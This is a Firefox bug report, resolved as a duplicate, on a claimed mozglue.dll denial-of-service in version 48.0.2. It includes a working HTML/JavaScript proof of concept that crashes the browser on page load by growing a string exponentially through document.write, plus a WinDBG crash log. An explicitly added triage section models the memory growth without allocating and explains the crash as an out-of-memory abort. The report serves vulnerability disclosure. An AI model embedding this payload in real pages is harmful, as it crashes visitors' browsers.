Closed Bug 1303694 Opened 8 years ago Closed 8 years ago

Firefox Browser 48.0.2 - (mozglue.dll) Denial Of Service Vulnerability

Categories

(Firefox :: Untriaged, defect)

48 Branch
defect
Not set
normal

Tracking


RESOLVED DUPLICATE of bug 380223

People

(Reporter: admin, Unassigned)

Details

User Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160823121617

Steps to reproduce:

PoC:

<body onload="javascript:VulnerabilityLab();"></body>
<script>
function VulnerabilityLab() {
    // Start from a single 'A' (\x41). Each pass appends a copy of the buffer plus
    // one more character, so the string length roughly doubles every iteration.
    var buffer = '\x41';
    for (var i = 0; i < 1337; i++) {
        buffer += buffer + '\x41';
        document.write('<html><marquee><h1>' + buffer + buffer);
    }
}
</script>

--- Debug Session Logs [WinDBG] ---

Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=5dee0a3e edx=00000000 esi=6e837466 edi=00ce70ce
eip=6e82efe5 esp=00ce7088 ebp=00ce70d4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00200206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Mozilla Firefox\mozglue.dll -
mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3

mozglue!mozalloc_abort+0x2c:
6e82efe5 cc              int     3
6e82efe6 6a03            push    3
6e82efe8 c7050000000021000000 mov dword ptr ds:[0],21h
6e82eff2 ff151060836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xf96 (6e836010)]
6e82eff8 50              push    eax
6e82eff9 ff155c60836e    call    dword ptr [mozglue!double_conversion::DoubleToStringConverter::ToFixed+0xfe2 (6e83605c)]
6e82efff cc              int     3
mozglue!mozalloc_handle_oom:
6e82f000 55              push    ebp

lmvm mozglue
start    end        module name
6e820000 6e83d000   mozglue    (export symbols)       C:\Program Files\Mozilla Firefox\mozglue.dll
    Loaded symbol image file: C:\Program Files\Mozilla Firefox\mozglue.dll
    Image path: C:\Program Files\Mozilla Firefox\mozglue.dll
    Image name: mozglue.dll
    Timestamp:        Wed Aug 24 06:53:43 2016 (57BD2857)
    CheckSum:         0001E87D
    ImageSize:        0001D000
    File version:     48.0.2.6079
    Product version:  48.0.2.6079
    File flags:       0 (Mask 3F)
    File OS:          4 Unknown Win32
    File type:        2.0 Dll
    File date:        00000000.00000000
    Translations:     0000.04b0
    CompanyName:      Mozilla Foundation
    ProductName:      Firefox
    InternalName:     Firefox
    OriginalFilename: mozglue.dll
    ProductVersion:   48.0.2
    FileVersion:      48.0.2
    FileDescription:  48.0.2
    LegalCopyright:   License: MPL 2
    LegalTrademarks:  Mozilla
    Comments:         Mozilla

Actual results:

Opening the PoC code as HTML allows remote attackers to crash the Mozilla Firefox browser and Firefox OS via mozglue.dll.

Expected results:

The script loop exception should capture the process to protect against uncaught exceptions, BOFs or other read/write access violations.
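Added triage aid, not the reporter's PoC or Mozilla code: it models the PoC loop's string growth without allocating anything, so one can see that the loop cannot get anywhere near 1337 passes and instead hits an allocation failure, which is exactly the mozalloc_handle_oom / mozalloc_abort path visible in the WinDBG log (a deliberate out-of-memory abort, not a memory-safety fault). The 2^28 - 1 character engine limit is an assumption used only for illustration; the real limit depends on the engine version.

```javascript
// Added example, not the reporter's PoC: models the PoC's string growth without
// allocating the strings. ASSUMED_MAX_STRING_LENGTH is an illustrative assumption.
const ASSUMED_MAX_STRING_LENGTH = 2 ** 28 - 1;
const WRITE_PREFIX = '<html><marquee><h1>';  // literal prefix passed to document.write
const POC_ITERATIONS = 1337;                 // loop bound in the PoC

// Length of `buffer` after n passes of `buffer += buffer + '\x41'`, starting from
// one character: each pass maps L to 2L + 1, so L(n) = 2^(n+1) - 1.
function bufferLengthAfter(n) {
  return 2 ** (n + 1) - 1;
}

// Largest string materialised in 0-based iteration i: the document.write argument,
// built after `buffer` has already grown to bufferLengthAfter(i + 1).
function peakLengthInIteration(i) {
  return WRITE_PREFIX.length + 2 * bufferLengthAfter(i + 1);
}

// First iteration whose peak string exceeds `limit` (the allocation that fails),
// or -1 if all 1337 passes would fit. Beyond 2^53 the lengths are approximate,
// but by then they are far above any realistic limit anyway.
function failingIteration(limit) {
  for (let i = 0; i < POC_ITERATIONS; i++) {
    if (peakLengthInIteration(i) > limit) return i;
  }
  return -1;
}

// Characters handed to document.write before the failing iteration, i.e. what the
// document already holds when the allocator gives up.
function charactersWrittenBefore(limit) {
  const stop = failingIteration(limit);
  const passes = stop === -1 ? POC_ITERATIONS : stop;
  let total = 0;
  for (let i = 0; i < passes; i++) {
    total += peakLengthInIteration(i);
  }
  return total;
}

console.log(`PoC would fail at iteration ${failingIteration(ASSUMED_MAX_STRING_LENGTH)} ` +
            `of ${POC_ITERATIONS}; loop bound is never reached`);
```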
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE